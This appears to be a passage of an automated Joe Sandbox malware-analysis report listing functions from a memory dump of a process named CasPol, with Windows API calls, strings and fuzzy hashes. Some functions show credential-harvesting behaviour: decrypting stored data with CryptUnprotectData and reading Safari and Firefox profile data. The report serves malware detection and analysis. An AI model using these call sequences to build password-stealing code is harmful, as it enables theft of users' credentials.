                                                                                                                                                                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                          • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                          APIs
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1213725291-0
                                                                                                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                          • free.MSVCRT ref: 00418370
                                                                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                                                                          • API String ID: 2360000266-2664311388
                                                                                                                                                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                          • API String ID: 2929817778-1134094380
                                                                                                                                                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                          APIs
                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                          Strings
                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
